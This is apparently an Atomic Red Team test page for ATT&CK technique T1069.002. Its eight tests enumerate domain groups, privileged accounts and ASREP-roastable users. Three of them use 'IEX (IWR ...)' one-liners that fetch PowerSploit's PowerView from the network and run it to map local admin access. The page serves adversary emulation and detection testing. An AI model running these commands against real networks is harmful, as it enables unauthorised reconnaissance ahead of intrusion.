CircleCI Atomic Red Team doc generator
312 lines
8.3 KiB
Markdown
312 lines
8.3 KiB
Markdown
# T1069.002 - Domain Groups
|
|
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1069/002)
|
|
<blockquote>Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
|
|
|
|
Commands such as <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.</blockquote>
|
|
|
|
## Atomic Tests
|
|
|
|
- [Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)](#atomic-test-1---basic-permission-groups-discovery-windows-domain)
|
|
|
|
- [Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)](#atomic-test-2---permission-groups-discovery-powershell-domain)
|
|
|
|
- [Atomic Test #3 - Elevated group enumeration using net group (Domain)](#atomic-test-3---elevated-group-enumeration-using-net-group-domain)
|
|
|
|
- [Atomic Test #4 - Find machines where user has local admin access (PowerView)](#atomic-test-4---find-machines-where-user-has-local-admin-access-powerview)
|
|
|
|
- [Atomic Test #5 - Find local admins on all machines in domain (PowerView)](#atomic-test-5---find-local-admins-on-all-machines-in-domain-powerview)
|
|
|
|
- [Atomic Test #6 - Find Local Admins via Group Policy (PowerView)](#atomic-test-6---find-local-admins-via-group-policy-powerview)
|
|
|
|
- [Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)](#atomic-test-7---enumerate-users-not-requiring-pre-auth-asreproast)
|
|
|
|
- [Atomic Test #8 - Adfind - Query Active Directory Groups](#atomic-test-8---adfind---query-active-directory-groups)
|
|
|
|
|
|
<br/>
|
|
|
|
## Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)
|
|
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
|
|
information will be displayed.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** dd66d77d-8998-48c0-8024-df263dc2ce5d
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Attack Commands: Run with `command_prompt`!
|
|
|
|
|
|
```cmd
|
|
net localgroup
|
|
net group /domain
|
|
net group "domain admins" /domain
|
|
net group "enterprise admins" /domain
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)
|
|
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
|
|
information will be displayed.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7
|
|
|
|
|
|
|
|
|
|
|
|
#### Inputs:
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| user | User to identify what groups a user is a member of | String | administrator|
|
|
|
|
|
|
#### Attack Commands: Run with `powershell`!
|
|
|
|
|
|
```powershell
|
|
get-ADPrincipalGroupMembership #{user} | select name
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #3 - Elevated group enumeration using net group (Domain)
|
|
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
|
|
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** 0afb5163-8181-432e-9405-4322710c0c37
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Attack Commands: Run with `command_prompt`!
|
|
|
|
|
|
```cmd
|
|
net group /domai "Domain Admins"
|
|
net groups "Account Operators" /doma
|
|
net groups "Exchange Organization Management" /doma
|
|
net group "BUILTIN\Backup Operators" /doma
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #4 - Find machines where user has local admin access (PowerView)
|
|
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** a2d71eee-a353-4232-9f86-54f4288dd8c1
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Attack Commands: Run with `powershell`!
|
|
|
|
|
|
```powershell
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #5 - Find local admins on all machines in domain (PowerView)
|
|
Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Attack Commands: Run with `powershell`!
|
|
|
|
|
|
```powershell
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #6 - Find Local Admins via Group Policy (PowerView)
|
|
takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** 64fdb43b-5259-467a-b000-1b02c00e510a
|
|
|
|
|
|
|
|
|
|
|
|
#### Inputs:
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| computer_name | hostname of the computer to analyze | Path | $env:COMPUTERNAME|
|
|
|
|
|
|
#### Attack Commands: Run with `powershell`!
|
|
|
|
|
|
```powershell
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)
|
|
When successful, accounts that do not require kerberos pre-auth will be returned
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** 870ba71e-6858-4f6d-895c-bb6237f6121b
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Attack Commands: Run with `powershell`!
|
|
|
|
|
|
```powershell
|
|
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
|
|
```
|
|
|
|
|
|
|
|
|
|
#### Dependencies: Run with `powershell`!
|
|
##### Description: Computer must be domain joined.
|
|
##### Check Prereq Commands:
|
|
```powershell
|
|
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
|
|
```
|
|
##### Get Prereq Commands:
|
|
```powershell
|
|
Write-Host Joining this computer to a domain must be done manually.
|
|
```
|
|
##### Description: Requires the Active Directory module for powershell to be installed.
|
|
##### Check Prereq Commands:
|
|
```powershell
|
|
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
|
|
```
|
|
##### Get Prereq Commands:
|
|
```powershell
|
|
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
|
|
```
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #8 - Adfind - Query Active Directory Groups
|
|
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups
|
|
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** 48ddc687-82af-40b7-8472-ff1e742e8274
|
|
|
|
|
|
|
|
|
|
|
|
#### Inputs:
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
|
|
|
|
|
|
#### Attack Commands: Run with `command_prompt`!
|
|
|
|
|
|
```cmd
|
|
#{adfind_path} -f (objectcategory=group)
|
|
```
|
|
|
|
|
|
|
|
|
|
#### Dependencies: Run with `powershell`!
|
|
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
|
|
##### Check Prereq Commands:
|
|
```powershell
|
|
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
|
|
```
|
|
##### Get Prereq Commands:
|
|
```powershell
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
|
|
```
|
|
|
|
|
|
|
|
|
|
<br/>
|